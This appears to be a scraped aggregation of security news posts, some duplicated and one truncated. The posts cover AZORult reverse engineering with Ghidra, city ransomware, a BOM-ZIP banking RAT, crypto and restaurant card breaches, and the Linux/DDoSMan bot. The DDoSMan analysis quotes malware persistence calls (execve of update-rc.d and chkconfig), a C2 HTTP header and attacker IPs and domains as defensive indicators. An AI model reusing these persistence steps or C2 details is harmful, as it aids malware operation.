The first details about the malware inner workings have been retrieved through the API calls tracing, where some interesting APIs emerged: the malware performs a check on the active processes, finding the typical malware analysis tools, like Wireshark, Process Explorer and Process Monitor.

Figure 3: API logging of the malware

Among the API calls, there is one quite interesting, an OpenProcess call referencing the process itself, referencing an embedded portable executable inside the original file: the payload.

Figure 4: Breakpoint on OpenProcess API allowing payload dump

Reversing the Payload with Ghidra

Hash70d038d221f79baf9114bf37815fe593965c28218fd70e72827a94984f52d968
ThreatAzorult – Payload
Size128 KB
SSDEEP3072:YxRaX6raoCoCyz6/mqv1JR+yBtGOeheWgieGq:caZ1tme+1wie5

The extracted payload is written in Delphi language, as confirmed with a first preliminary analysis. Thus, we decided to test Ghidra in order to statically analyze the malware.

Figure 6: Static information about the Azorult payload

Using the Ghidra search strings function we found the hardcoded C2 address in plain-text, meaning the malware writers do not bother to protect its payload, but only the container. This IP address is the same was seen during the dynamic analysis section, as shown in Figure 2. Also, the malware uses a custom user-agent.

Figure 7: Communication routine with the C2 and hardcoded address

Then, we managed to gather the characteristic strings of the payload, finding many interesting ones, extensively reported in the section “Configuration Strings”. Thanks to this, we have also isolated the AZORult routine used to gather and store the Mozilla cookies (Figure 8).

Figure 8: Routine for gathering information of Mozilla

Digging further, we identified the “shell routine” which allows the command and control operator to execute arbitrary commands on the victim machine. The code snippet shown in Figure 9 shows how the malware exploits this capability to delete its execution traces into the victim machine.

We also leveraged Ghidra built-in script engines to test Yara rules against the inspected code. This flexibility is one of the main characteristics makes Ghidra a valuable tool for a Reverse Engineer.

Figure 10: Ghidra scripts list

Using the “YaraGhidraGUIScript”, available off-the-shelf in the tool, we managed to write down an ad hoc rule to spot the in-memory payload.

Figure 11: Yara Ghidra GUI script

The usage of this extension is quite intuitive: the analyst has to select the piece of disassembled code he/she consider representative of the malicious behaviour.

Figure 12: Selection of the piece of code to generate the Yara Rule

For instance, the selected piece of code in Figure 12 refers to the routine used by AZORult to contact the C2 with the specific User-Agent. Selecting it into the “YaraGhidraGUIScript”, a new popup forms shows the analyst a powerful Yara generation helper.

Figure 13: GUI of the Ghidra plugin

The Yara GUI shows a smart rule proposal and allows the analyst to freely edit it: in this case the Hex values of the PUSH and MOV operation could be relative to the current virtual addressing of the specific machine, so by clicking on these values, the script replaces the operand values with the wildcard “?”, preserving the assembly instructions.

Figure 14: Refinement of the generated Yara Rule by replacing the operand values with wildcards

The resulting Yara rule is reported the right section “Yara rules” below.

Conclusion

Ghidra is a valuable tool in the arsenal of a Reverse Engineer. It freely provides advanced features like the code decompilation, that was typically available into high end commercial products, accessible to well budgeted professionals. The NSA choice to give back to the security community is admirable, especially because the tool itself is solid and has advanced peculiarities that make it suitable for professional usage.

Anyway, it is not possible to directly compare it to commercial products, or wondering if it may be able to replace any of those, it’s conceptually erroneous, and after this field test we can confirm Ghidra is a valuable tool should be included in every reverse engineering’s arsenal.


Further technical details, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published on the Yoroi blog:

Pierluigi Paganini

(SecurityAffairs – Ghidra, malware)

The post Analyzing AZORult malware using NSA Ghidra suite appeared first on Security Affairs.

Security Affairs: Analyzing AZORult malware using NSA Ghidra suite

Cybaze-Yoroi ZLAB malware researchers decided to use the NSA Ghidra suite in a real case study, the analysis of the AZORult malware.

Introduction

One of the most expected moments in the infosec community during the last few months was, with no doubt, the Ghidra public release. On the 5th of March, at the RSA conference, Ghidra has been presented to the public revealing the inner details of the Software Reverse Engineering (SRE) framework that National Security Agency used for more than a decade.

Its release was a sort of “main event” for security researchers all around the globe, which immediately started exploring its functionalities to find out its place within the reversing tool panorama. Cybaze-Yoroi ZLAB team also decided to play around with it, but this time using a real case study, AZORult: one of the most active threats spreading nowadays, always using new methodologies to avoid detection. For this reason, a recent AZORult sample has been chosen to field-test the NSA reverse engineering tool.

Technical Analysis

Hash12a7b79430bf3b788396009eadb6cbc4da97cba55c6653048d2dd294fa90dc3a
ThreatAzorult
Size809 KB
SSDEEP12288:KKi7ifyf5/TIEAcp2o/DZDlvs6SskijhnHW3/qgQrjSh4rNxPXJE:K6m5UYZRUokohnH4QrjCCP5E

The sample is a PE32 file apparently coded in Visual C++, containing references to major IT companies in its metadata fields like Google and Amazon.

Figure 1: Static information about the sample

Dynamically executing the malware, we are able to isolate only a few actions of the malware, because its C2 server wasn’t active at the time of analysis, probably due to a configuration error.

Figure 2: Communication of the malware with the C2

So, after contacting the server, the sample does not have the possibility to download other components and configurations. Thus, the malware kills itself and terminates its execution.  For this reason, we focused the investigation into static analysis and debugging.

Digging into the Sample

The first details about the malware inner workings have been retrieved through the API calls tracing, where some interesting APIs emerged: the malware performs a check on the active processes, finding the typical malware analysis tools, like Wireshark, Process Explorer and Process Monitor.

Figure 3: API logging of the malware

Among the API calls, there is one quite interesting, an OpenProcess call referencing the process itself, referencing an embedded portable executable inside the original file: the payload.

Figure 4: Breakpoint on OpenProcess API allowing payload dump

Reversing the Payload with Ghidra

Hash70d038d221f79baf9114bf37815fe593965c28218fd70e72827a94984f52d968
ThreatAzorult – Payload
Size128 KB
SSDEEP3072:YxRaX6raoCoCyz6/mqv1JR+yBtGOeheWgieGq:caZ1tme+1wie5

The extracted payload is written in Delphi language, as confirmed with a first preliminary analysis. Thus, we decided to test Ghidra in order to statically analyze the malware.

Figure 6: Static information about the Azorult payload

Using the Ghidra search strings function we found the hardcoded C2 address in plain-text, meaning the malware writers do not bother to protect its payload, but only the container. This IP address is the same was seen during the dynamic analysis section, as shown in Figure 2. Also, the malware uses a custom user-agent.

Figure 7: Communication routine with the C2 and hardcoded address

Then, we managed to gather the characteristic strings of the payload, finding many interesting ones, extensively reported in the section “Configuration Strings”. Thanks to this, we have also isolated the AZORult routine used to gather and store the Mozilla cookies (Figure 8).

Figure 8: Routine for gathering information of Mozilla

Digging further, we identified the “shell routine” which allows the command and control operator to execute arbitrary commands on the victim machine. The code snippet shown in Figure 9 shows how the malware exploits this capability to delete its execution traces into the victim machine.

We also leveraged Ghidra built-in script engines to test Yara rules against the inspected code. This flexibility is one of the main characteristics makes Ghidra a valuable tool for a Reverse Engineer.

Figure 10: Ghidra scripts list

Using the “YaraGhidraGUIScript”, available off-the-shelf in the tool, we managed to write down an ad hoc rule to spot the in-memory payload.

Figure 11: Yara Ghidra GUI script

The usage of this extension is quite intuitive: the analyst has to select the piece of disassembled code he/she consider representative of the malicious behaviour.

Figure 12: Selection of the piece of code to generate the Yara Rule

For instance, the selected piece of code in Figure 12 refers to the routine used by AZORult to contact the C2 with the specific User-Agent. Selecting it into the “YaraGhidraGUIScript”, a new popup forms shows the analyst a powerful Yara generation helper.

Figure 13: GUI of the Ghidra plugin

The Yara GUI shows a smart rule proposal and allows the analyst to freely edit it: in this case the Hex values of the PUSH and MOV operation could be relative to the current virtual addressing of the specific machine, so by clicking on these values, the script replaces the operand values with the wildcard “?”, preserving the assembly instructions.

Figure 14: Refinement of the generated Yara Rule by replacing the operand values with wildcards

The resulting Yara rule is reported the right section “Yara rules” below.

Conclusion

Ghidra is a valuable tool in the arsenal of a Reverse Engineer. It freely provides advanced features like the code decompilation, that was typically available into high end commercial products, accessible to well budgeted professionals. The NSA choice to give back to the security community is admirable, especially because the tool itself is solid and has advanced peculiarities that make it suitable for professional usage.

Anyway, it is not possible to directly compare it to commercial products, or wondering if it may be able to replace any of those, it’s conceptually erroneous, and after this field test we can confirm Ghidra is a valuable tool should be included in every reverse engineering’s arsenal.


Further technical details, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published on the Yoroi blog:

Pierluigi Paganini

(SecurityAffairs – Ghidra, malware)

The post Analyzing AZORult malware using NSA Ghidra suite appeared first on Security Affairs.



Security Affairs

Computer systems in the City of Albany hit in Ransomware Attack

Another ransomware attack made the headlines, this time the victim is the City of Albany, its computer systems were infected with the malware.

Computer systems in the City of Albany, New York, were infected with ransomware over the weekend that disrupted some municipal computers.

According to Albany Mayor Kathy Sheehan, no personal information belonging to government workers or residents was compromised during the ransomware attack.

city of albany
Source Albanyhomes411.com

According to the Times Union, the City of Albany will offer credit monitoring to its employees as a precaution.

“Albany Mayor Kathy Sheehan says it appears no personal information about government workers or residents was taken during a weekend ransomware attack that disabled some municipal computers.” reads the post published by the USNews website.

The mayor confirmed that the ransomware attack did not affect the dispatching of police and firefighters.

The ransomware attack began on Saturday morning, at the time of writing authorities did not provide technical details about the attack.

Hackers access computers then refuse to release control until a ransom is paid.

In the past, similar attacks were reported in the US, in January the City Hall of Del Rio, Texas, was hit by a ransomware attack and operations were suspended.

In April 2018 a massive ransomware attack hit computer systems in the City of Atlanta. while in November 2018, the City of Spring Hill, Tenn, suffered a ransomware attack,

Pierluigi Paganini

(SecurityAffairs – City of Albany , ransomware attack)

The post Computer systems in the City of Albany hit in Ransomware Attack appeared first on Security Affairs.

Security Affairs: Computer systems in the City of Albany hit in Ransomware Attack

Another ransomware attack made the headlines, this time the victim is the City of Albany, its computer systems were infected with the malware.

Computer systems in the City of Albany, New York, were infected with ransomware over the weekend that disrupted some municipal computers.

According to Albany Mayor Kathy Sheehan, no personal information belonging to government workers or residents was compromised during the ransomware attack.

city of albany
Source Albanyhomes411.com

According to the Times Union, the City of Albany will offer credit monitoring to its employees as a precaution.

“Albany Mayor Kathy Sheehan says it appears no personal information about government workers or residents was taken during a weekend ransomware attack that disabled some municipal computers.” reads the post published by the USNews website.

The mayor confirmed that the ransomware attack did not affect the dispatching of police and firefighters.

The ransomware attack began on Saturday morning, at the time of writing authorities did not provide technical details about the attack.

Hackers access computers then refuse to release control until a ransom is paid.

In the past, similar attacks were reported in the US, in January the City Hall of Del Rio, Texas, was hit by a ransomware attack and operations were suspended.

In April 2018 a massive ransomware attack hit computer systems in the City of Atlanta. while in November 2018, the City of Spring Hill, Tenn, suffered a ransomware attack,

Pierluigi Paganini

(SecurityAffairs – City of Albany , ransomware attack)

The post Computer systems in the City of Albany hit in Ransomware Attack appeared first on Security Affairs.



Security Affairs

E Hacking News – Latest Hacker News and IT Security News: Banking Malware Being Distributed By Hackers Via Password Protected Zip Files!





Cyber-cons have a new way of wreaking havoc. Hackers have found another unique way to bypass security. Reportedly the infamous BOM technique’s to blame.

The “Byte Order Mark” technique goes about altering the host’s files on the windows system.

The major superpower of the BOM is helping the threat actor group to be under the line of display or detection.

The researchers from a very widely known anti-virus firm noticed a new campaign that majorly worked on spear phishing.

The spear phishing process would help to deliver the infected files to the victim’s system.

The moment the user attempts to open the ZIP file using their default browser, it all crashes and an error sign pops up, saying.

According to the researchers, the legit ZIP files start with “PK” and are of (0x 504B). The BOM have extra three bytes (0x EFBBBF) found within UTF-8 text files.

In some systems the ZIP archive format goes undetected but in some systems it’s recognized as a UTF-8 text file and the malicious payload isn’t extracted.

The same files on the other hand could be opened via third-party functions to name a few 7-Zip & WinRAR.

Once the extraction of the file is done, the malware is executed thence beginning the infection process.

Systems using third party utilities are more susceptible to such malware attacks than the rest.

The malicious executable is just a tool to help load the main payload inserted within the main source section.

The malware originates from a DDL along with a BICDAT function encrypted with the XOR based algorithm.
The library then downloads a second stage of payload, the password protected ZIP file.
The dcyber crownloaded payload material is encrypted using similar functions as the inserted payload.
After having extracted the necessary files the last and final payload is launched, which goes by the name of “Banking RAT malware.”
This RAT scours information like access card codes, dates of birth, account passwords, electronic signature, e-banking passwords and etc from the system.


E Hacking News - Latest Hacker News and IT Security News

Banking Malware Being Distributed By Hackers Via Password Protected Zip Files!





Cyber-cons have a new way of wreaking havoc. Hackers have found another unique way to bypass security. Reportedly the infamous BOM technique’s to blame.

The “Byte Order Mark” technique goes about altering the host’s files on the windows system.

The major superpower of the BOM is helping the threat actor group to be under the line of display or detection.

The researchers from a very widely known anti-virus firm noticed a new campaign that majorly worked on spear phishing.

The spear phishing process would help to deliver the infected files to the victim’s system.

The moment the user attempts to open the ZIP file using their default browser, it all crashes and an error sign pops up, saying.

According to the researchers, the legit ZIP files start with “PK” and are of (0x 504B). The BOM have extra three bytes (0x EFBBBF) found within UTF-8 text files.

In some systems the ZIP archive format goes undetected but in some systems it’s recognized as a UTF-8 text file and the malicious payload isn’t extracted.

The same files on the other hand could be opened via third-party functions to name a few 7-Zip & WinRAR.

Once the extraction of the file is done, the malware is executed thence beginning the infection process.

Systems using third party utilities are more susceptible to such malware attacks than the rest.

The malicious executable is just a tool to help load the main payload inserted within the main source section.

The malware originates from a DDL along with a BICDAT function encrypted with the XOR based algorithm.
The library then downloads a second stage of payload, the password protected ZIP file.
The dcyber crownloaded payload material is encrypted using similar functions as the inserted payload.
After having extracted the necessary files the last and final payload is launched, which goes by the name of “Banking RAT malware.”
This RAT scours information like access card codes, dates of birth, account passwords, electronic signature, e-banking passwords and etc from the system.

Inside job: Bithumb crypto exchange hacked again; loses $20 million

By ghostadmin

This is the third time that Bithumb has been hacked to steal millions in cryptocurrency. Crypto industry is being hammered by cybercriminals with full frequency lately. There are reports of a new attack against South Korean bitcoin exchange called Bithumb due to which the exchange got hacked. The attack occurred on the morning of Saturday. This […]

This is a post from HackRead.com Read the original post: Inside job: Bithumb crypto exchange hacked again; loses $20 million

Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach

Last week, Earl Enterprises admitted having suffered a payment card data breach from tens of its restaurants over a period of 10 months.

Earl Enterprises admitted that hackers have stolen payment card data from tens of its restaurants over a period of 10 months.

Restaurants at Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria owned by Earl Enterprises were impacted by the security breach. An investigation confirmed that almost all the Buca di Beppo locations across the United States have been affected by the breach. The incident also impacted many other locations belonging to the other brands of the Earl Enterprises holding.

Crooks used a PoS malware to syphon payment card data from point-of-sale (PoS) systems at the affected locations. The malicious code was designed to capture card numbers, expiration dates and cardholder names.

Customers that made payment at the impacted locations between May 23, 2018 and March 18, 2019, may be affected. Earl Enterprises published a notice of breach that allows users to discover potentially affected restaurants.

“Earl Enterprises recently became aware of a data security incident potentially affecting payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Potentially affected restaurants include the following brands: Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria.” reads the data breach notification. “We are providing this notice to our guests to inform them of the incident and steps they can take to help protect themselves. The security and privacy of our guests’ payment card data is a top priority, and Earl Enterprises deeply regrets that this incident occurred.”

According to the data breach notification, Planet Hollywood hotels or stores Bertucci’s, neither were Seaside on the Pier and Café Hollywood brands were not affected.

“This incident may affect payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Payment card information could have included credit and debit card numbers, expiration dates and, in some cases, cardholder names.” continues the notice.

The company confirmed that locations outside of the United States were not affected.

Unfortunately, the stolen data may be already available on the cyber crime underground. The popular investigator Brian Krebs reported that, on February 20, the black marketplace Joker’s Stash had offered for sale roughly 2.15 million stolen cards that appeared to have been stolen from Earl Enterprises restaurants.

Krebs reported its discovery to Earl Enterprises that quickly launched an investigation with the support of two cybersecurity firms and feds.

Pierluigi Paganini

(SecurityAffairs – Earl Enterprises, hacking)

The post Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach appeared first on Security Affairs.

Security Affairs: Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach

Last week, Earl Enterprises admitted having suffered a payment card data breach from tens of its restaurants over a period of 10 months.

Earl Enterprises admitted that hackers have stolen payment card data from tens of its restaurants over a period of 10 months.

Restaurants at Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria owned by Earl Enterprises were impacted by the security breach. An investigation confirmed that almost all the Buca di Beppo locations across the United States have been affected by the breach. The incident also impacted many other locations belonging to the other brands of the Earl Enterprises holding.

Crooks used a PoS malware to syphon payment card data from point-of-sale (PoS) systems at the affected locations. The malicious code was designed to capture card numbers, expiration dates and cardholder names.

Customers that made payment at the impacted locations between May 23, 2018 and March 18, 2019, may be affected. Earl Enterprises published a notice of breach that allows users to discover potentially affected restaurants.

“Earl Enterprises recently became aware of a data security incident potentially affecting payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Potentially affected restaurants include the following brands: Buca di Beppo, Earl of Sandwich, Planet Hollywood, Chicken Guy!, Mixology and Tequila Taqueria.” reads the data breach notification. “We are providing this notice to our guests to inform them of the incident and steps they can take to help protect themselves. The security and privacy of our guests’ payment card data is a top priority, and Earl Enterprises deeply regrets that this incident occurred.”

According to the data breach notification, Planet Hollywood hotels or stores Bertucci’s, neither were Seaside on the Pier and Café Hollywood brands were not affected.

“This incident may affect payment card information of a limited number of guests that dined at certain of Earl Enterprises’ restaurants. Payment card information could have included credit and debit card numbers, expiration dates and, in some cases, cardholder names.” continues the notice.

The company confirmed that locations outside of the United States were not affected.

Unfortunately, the stolen data may be already available on the cyber crime underground. The popular investigator Brian Krebs reported that, on February 20, the black marketplace Joker’s Stash had offered for sale roughly 2.15 million stolen cards that appeared to have been stolen from Earl Enterprises restaurants.

Krebs reported its discovery to Earl Enterprises that quickly launched an investigation with the support of two cybersecurity firms and feds.

Pierluigi Paganini

(SecurityAffairs – Earl Enterprises, hacking)

The post Buca di Beppo, Planet Hollywood and other restaurants owned by Earl Enterprises hit by card breach appeared first on Security Affairs.



Security Affairs

BREAKING: new update about DDoS’er Linux/DDoSMan ELF malware based on Elknot

The popular expert unixfreaxjp analyzed a new China ELF DDoS’er malware tracked as “Linux/DDoSMan” that evolves from the Elknot malware to deliver new ELF bot.

Non-Technical-Premise

This report is meant for incident response or Linux forensics purpose, TO HELP admin & IR folks”, with this the very beginning sentence starts the new analysis of one of the reverser of the worldwide extended security community, the head of MalwareMustDie team, (Mr.) unixfreaxjp. And the first thought coming at the mind is: while everybody is looking for “fame” and “glory” here there is someone who is working hard just “TO HELP”. It is there a security group greater than this?

But let’s go to the finding.

The new unixfreaxjp’s analysis talks about a new China ELF malware DDoS’er “Linux/DDoSMan” which seems to be a new DDoS botnet client installer that utilized the old Elknot bot binary (also known as ChickDDoS or Mayday) along with a new ELF bot (as downloader and persistence function installer): these are two ELF bot binaries which are dropped by the new found Linux/DDoSMan .

About this attribution unixfreaxjp comments on Virus Total as follows:  “This is the new bot client of the “DDOS manager” toolkit used by China(PRC) DoS attacker.  (….) The code seems inspired from multiple source code of China basis DDoS client, like Elknot. Not xorDDoS or ChinaZ one, not a surprise since many of code shared openly.

But what kind of malware is this Elknot Trojan? How the MMD team found this in the first place? The story is well documented going back in the past years when one project of MalwareMustDie (MMD) team was very active to monitor the China origin ELF DDoS’er malware threat since Aug 2012. The growth was very rapid at that time (Sept. 2014), as described on the MMD blog when MMD detected 5 variants active under almost 15 panels scattered in China network.  There is a video describing their work that shows many of Elknot analysis was posted.

On the MMD blog is still possible to read “I am quite active in supporting the team members of this project, so recently almost everyday I reverse ELF files between 5-10 binaries. They are not aiming servers with x32 or x64 architecture but the router devices that runs on Linux too.” We could say here to have a ““Mirai” idea “ante-litteram” 2 years before. Firstly written, the Linux/Elknot was analyzed and published publicly in the kernelmode.info as per below post:

Elknot

Which links to the MMD behavior analysis report in 2013 in here and further debug report  as follows in here: the latter one it describes the committed malware name as Linux/Elknot. The further analysis and report of the ELknot infection is written nearly in the kernelmode.info in the same thread. Thank you to the admin team of KernelMode who still keep the documentation of this malware analysis still available until now.

Linux/Elknot malware that time is known for multiple standard packet flood in several protocols (UDP, TCP, ICMP & HTTP) and amplification DNS attack of the China series of this DDoS trojan was firstly introduced by the this malware, before Linux/BillGates started to be detected. We can say Linux/Elknot series is the oldest root of the many ELF flooder built by adversaries in the same territory, and one of the most popular ELF flooder in that territory within 2014.

But if we go on the Akamai blog we can still find a reference to Elknot posted on April 4, 2016 on a topic referred to “BillGates”, another DDoS malware whose “attack vectors available within the toolkit include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP Flood (Layer7) and DNS reflection floods. This malware is an update and reuse from the Elknot’s malware source code. It’s been detected in the wild for a few years now.”. So we can see that Akamai blog explicitly talks about Elknot linking directly the web page of MalwareMustDie blog and telling with the language of the politically correct that for the “botnet activity, most of the organizations are located in the Asia region”. If we go deeper in the Elknot series analysis on MMD blogs  mentioned above (“about the ARM version of Eknot basis with so many specific modification reversed and reported”)  we get many interesting information and we learn a lot about China malware including Elknot scheme.

Elknot DDoS

Figure 1: The ARM version of Elknot malware on MMD blog

And inside this post we can find  a lot of considerations about the behavior of the malware and of the threat actor like the encryption of the binary and of the communication: “This a sign of protection, someone want to hide something, in the end that person is hiding EVERYTHING which ending up to be very suspicious 🙂 – So the binary could be packed or encrypted protection, we have many possibility.

Further details of this family of ELF malware we posted regularly in here:–>[link]”

The further details on Linux/AESDDoS are on kernelmode.info as is referred by unifreaxjp on his new analysis that can be found here: https://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The new Malware

But let’s go back to the new analysis: we have a combination of “new” and “old” code  that is allowing the bot client to perform an interaction client and server involving multiple platform used by this botnet: the ELF bot (the client) is delivered on compromised devices in  Linux platform while the C&C (Win32 PE) is in listening mode on a Windows platform waiting for a callbacks sent by the bot-installer, the one that executes the new ELF is the “downloader” and “installer” while the old Elkont code is responsible to manage the DDoS related configuration part, in example: to execute commands sent from C2, sending statistic data of the infected servers , threading, DDOS attacks, etc, as is shown in the next figure.

Elknot DDoS

Figure 2: The C2 software for Linux DDoS

Going deeper in the unixfreaxjp’s analysis we read more about the new scheme adopted in the malware configuration:

The C2 tool is having IP node scanner and attack function to compromise weak x86?32 server secured auth, DoS attack related commands to contrl the botnet nodes, and the payload management tools. Other supportive samples are also exists to help to distribute the Linux bot installer to be sent successfully to the compromised device, it works under control of the C2 tool. This C2 scheme is new, along with the installer / updater. The Elknot DoS ELF dropped is not new.”

But let’s see what are the execution binaries and what an administrator will see during the first stage of the infection, because this analysis is made for the purpose to raise the system administration awareness:

Installation related code execution:

Code execution:

execve("/tmp/upgrade"");   // to execute upgrade
execve("/bin/update-rc.d",
["update-rc.d", "python3.O", "defaults"]); // for
updating  the malicious task
execve("/usr/bin/chkconfig",
["chkconfig", "--add", "python3.O"]); // for
persistence

What administrator will see:

(Unknown) process with image executed from /proc/{PID}/cmdline, with forked from “evil” crond (dropped, executed and deleted malware) process.

The Client Side

Giving a look to the bot client we’ll see that once the malware has infected the remote host the installer ELF will read all server process info by launching open(“/proc/{PID}/cmdline”) for the further malicious purpose. The bot client then will collect infected systems data to send to the C2  in the URL as per shown by the screenshot below, the purpose of this data sent to C2 is for informing the C2 what system is infected so the C2 can send the traffic data back to infected machine with the upgrading binary for the further infection, and also for the statistic of the infected machines. The data of infected machine will be shorted by the Windows C2 utility tool called “Manager” as per shown in the above Win32 GUI screenshot, and that C2 tool will send the infected machine data to the static page served on another host in the web (which seems now is abandoned by the adversary).

Figure 3: Header of the ELF communication

The C2 data is sent from bot client via the malware’s “fabricated” headers as follows, to be processed further as per described previously. This below HTTP header is unique and can be used to mitigate the threat, which is a new action (not spotted in Elknot).

Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: {SIZE OF SENT DATA}\r\n
Host: 193[.]201[.]224[.]238:8852\r\n

User-Agent: LuaSocket 3.0-rc1\r\n

TE: trailers\r\n
Connection: close, TE\r\n\r\n

In contrary, Linux/Elknot bot client series will send or receive its data to C2 always in the encoded form instead, with a lot of padding 00 in between. They are using assembly obfuscation to rotate the encoded values. And the way Elknot communicate to the C2 is not using the HTTP protocol but directly write the communication data in the packet to the specific established TCP/port (original protocol often used by China basis malware, windows or linux platform).

After the initial communication is established, the C2 sent the “upgrade” to the Linux/DDosMan bot client according to platform of infected server: it is saved, renamed  and executed on the infected node as the upgrade version of the initial malware. The bot client will start its main function. The analysis of unixfreaxjp says that its further process, including to drop ELF binaries embedded in the main ELF binary, is to execute them to perform their parts of malicious activity. “The dropped & executed “downloader” embedded ELF is actually the one that responsible for the “persistence setup” operation too. This part haven’t been seen in Elknot. And this is not even in the main sample file too. In THIS dropped ELF you can see well the downloader and the persistence installer in the same file.”

See the next figure for the explanation:

Figure 4: Snapshot of the Installer/downloader

Additionally the same connection is reused and the initial code that opens the connection toward the C2 responsible to manage the update of the malware on the infected node.

So only one dropped binary is the Elknot.” says unixfreaxjp, “Obviously, there is no DDoS functionality in the main sample ELF file or the Downloader ELF file too, the Elknot has it, and the adversary tend to use that function from the C2 tool.”

The Server Side (C2 Tool)

Regarding the C2 tool we have a “Win32” PE and it has the Elknot basis C2 form, along with many additional other forms as we reported in the Figure 2. We can see the scanner tool, interface to write code execution to Linux shell after attack has been performed successfully. With these capabilities  the threat actor can use any kind of compromised Windows machine to manage the C2 from its attacks.

To perform the malicious intent the attacker will need the ELF file to send, the script to be sent to hacked PC and the ELF file to be installed after infecting along with its execution toolset.

In order to have an idea on “how the adversary work in making this toolset” MMD has produced a very interesting video published on Youtube describing the techniques adopted  by the China threat actors

Elknot DDoS

Figure 5: MMD Video on Youtube describing China threat actors techniques to delivery malware

Reversing the C2 tool it smells of  China even if the reader is not able to translate.

and recording them live from a compromised server.

Elknot DDoS

Figure 6: MMD reverse of the C2 Tool

Adversary’s infrastructure info are in the following

The adversary network is as per below (domain, IP and port)

cctybt.com.     3600 IN A 103.119.28.12 tcp/8080

193.201.224.238 tcp/8852

Located in these networks:

AS136782 | 103.119.28.0/24 | PINGTAN-AS | AP Kirin Networks, CN

AS25092 | 193.201.224.0/22 | OPATELECOM, | UA

For the full IOCs and other details of the malware please refer to the Mr. unixfreaxjp research at: https://imgur.com/a/57uOiTu

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp team leader of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Elknot malware, DDoS)

The post BREAKING: new update about DDoS’er Linux/DDoSMan ELF malware based on Elknot appeared first on Security Affairs.

Security Affairs: New Linux/DDosMan threat emerged from an evolution of the older Elknot

The popular expert unixfreaxjp analyzed a new China ELF DDoS’er malware tracked as “Linux/DDoSMan” that evolves from the Elknot malware to deliver new ELF bot.

Non-Technical-Premise

This report is meant for incident response or Linux forensics purpose, TO HELP admin & IR folks”, with this the very beginning sentence starts the new analysis of one of the most talented reverser of the worldwide extended security community, the head of MalwareMustDie team, Mr. unixfreaxjp. And the first thought coming at the mind is: while everybody is looking for “fame” and “glory” here there is working someone hard just “TO HELP”. It is there a security group greater than this?

But let’s go to the finding.

The new Mr. unixfreaxjp’s analysis talks about a new China ELF malware DDoS’er “Linux/DDoSMan” which seems to be a new artifact that uses the old Elknot code to deliver new ELF bot: in fact there are two new ELF bot binaries which are dropped by Elknot Trojan (also known as ChickDDoS or Mayday).

About this attribution Mr. unixfreaxjp comments on VirusTotal as follows:  “This is the new bot client of the “DDOS manager” toolkit used by China(PRC) DoS attacker.  (….) The code seems inspired from multiple source code of China basis DDoS client, like Elknot. Not xorDDoS or ChinaZ one, not a surprise since many of code shared openly.

But what kind of malware is this Elknot Trojan? The story is well documented going back in the past years when one project of MalwareMustDie team was very active to monitor the China origin ELF DDoS’er malware threat. The growth was very rapid at that time (Sept. 2014), as described on the MMD blog when MMD detected 5 variants active under almost 15 panels scattered in China network.

On the MMD blog is still possible to read “I am quite active in supporting the team members of this project, so recently almost everyday I reverse ELF files between 5-10 binaries. They are not aiming servers with x32 or x64 architecture but the router devices that runs on Linux too.” We could say here to have a ““Mirai” idea “ante-litteram” 2 years before.

But if we go on the Akamai blog we can still find a reference to Elknot posted on April 4, 2016 on a topic referred to “BillGates”, another DDoS malware whose “attack vectors available within the toolkit include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP Flood (Layer7) and DNS reflection floods. This malware is an update and reuse from the Elknot’s malware source code. It’s been detected in the wild for a few years now.”. So we can see that Akamai blog explicitly talks about Elknot linking directly the web page of MalwareMustDie blog and telling with the language of the politically correct that for the “botnet activity, most of the organizations are located in the Asia region”.

If we go deeper in the Elknot MMD blog  in the post(“about the ARM version of Eknot with so many specific modification reversed and reported”)  we get many interesting information and we learn a lot about China malware including Elknot scheme.

Elknot DDoS

Figure 1: The ARM version of Elknot malware on MMD blog

And inside this post we can find  a lot of considerations about the behavior of the malware and of the threat actor like the encryption of the binary and of the communication: “This a sign of protection, someone want to hide something, in the end that person is hiding EVERYTHING which ending up to be very suspicious 🙂 – So the binary could be packed or encrypted protection, we have many possibility.

Further details of this family of ELF malware we posted regularly in here:–>[link]”

The further details are on kernelmode.info as is referred by Mr. unifreaxjp on his new analysis that can be found here: https://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The new Malware

But let’s go back to the new analysis: we have a combination of “new” and “old” code  that is able to perform an interaction among different platforms: the ELF bot (the client) is delivered on a Linux platform while the C&C (Win32 PE) is in listening mode on a Windows platform waiting for a callbacks by infected bots: the new ELF is the “downloader” and “installer” while the old Elkont code is responsible to manage the configuration, to make stats , threading, DDOS attacks, etc, as is shown in the next figure.

Elknot DDoS

Figure 2: The C2 software for Linux DDoS

Going deeper in the Mr. unixfreaxjp’s analysis we read more about the new scheme adopted in the malware configuration:

The C2 tool is having IP node scanner and attack function to compromise weak x86?32 server secured auth, DoS attack related commands to contrl the botnet nodes, and the payload management tools. Other supportive samples are also exists to help to distribute the Linux bot installer to be sent successfully to the compromised device, it works under control of the C2 tool. This C2 scheme is new, along with the installer / updater. The Elknot DoS ELF dropped is not new.”

But let’s see what are the execution binaries and what an administrator will see because this analysis IS for rise the system administration awareness:

Code execution:

execve("/tmp/upgrade"");   // to execute upgrade
execve("/bin/update-rc.d",
["update-rc.d", "python3.O", "defaults"]); // for
updating  the malicious task
execve("/usr/bin/chkconfig",
["chkconfig", "--add", "python3.O"]); // for
persistence

What administrator will see:

(Unknown) process with image executed from /proc/{PID}/cmdline, with forked from “evil” crond (dropped, executed and deleted malware) process.

The Client Side

